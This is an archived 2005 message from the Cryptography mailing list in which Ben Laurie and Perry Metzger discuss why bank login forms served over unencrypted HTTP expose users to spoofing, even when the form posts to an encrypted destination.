[17398] in cryptography@c2.net mail archive
Re: encrypted tapes
daemon@ATHENA.MIT.EDU (Ben Laurie)
Wed Jun 8 10:51:56 2005
X-Original-To: cryptography@metzdowd.com
Date: Wed, 08 Jun 2005 15:40:22 +0100
From: Ben Laurie <ben@algroup.co.uk>
To: "Perry E. Metzger" <perry@piermont.com>
Cc: cryptography@metzdowd.com
In-Reply-To: <87zmu1j6b1.fsf@snark.piermont.com>
Perry E. Metzger wrote:
> Ben Laurie <ben@algroup.co.uk> writes:
>
>>Perry E. Metzger wrote:
>>
>>>Have a look, for example, at http://www.americanexpress.com/
>>>which encourages users to type in their credentials, in the clear,
>>>into a form that came from lord knows where and sends the information
>>>lord knows where. Spoof the site, and who would notice?
>>>Every company should be telling its users never to type in their
>>>credentials on a web page downloaded in the clear, but American
>>>Express and lots of other companies train their users to get raped,
>>>and why do they do it? Not because they made some high level decision
>>>to screw their users. Not because they can't afford to do things
>>>right. It happens because some idiot web designer thought it was a
>>>nice look, and their security people are too ignorant or too powerless
>>>to stop it, that's why.
>>
>>Why is it bad for the page to be downloaded clear? What matters is the
>>destination is encrypted, surely?
>
>
> Why is it a problem? Because the http post method you're relying on
> could have come from anyone -- you're just assuming that it posts to
> Amex's site.
>
> How often do users hit ^U and read the source on the front page of a
> site like this? Never, for practical purposes. Unless you're looking
> at the code every time, you have no idea where your form data gets
> posted. It could be a server in Moldova instead of Manhattan.
Fair point. Of course, I knew because I did hit ^U - and followed
through to the page containing the javascript it ran!
--
http://www.apache-ssl.org/ben.html http://www.thebunker.net/
"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
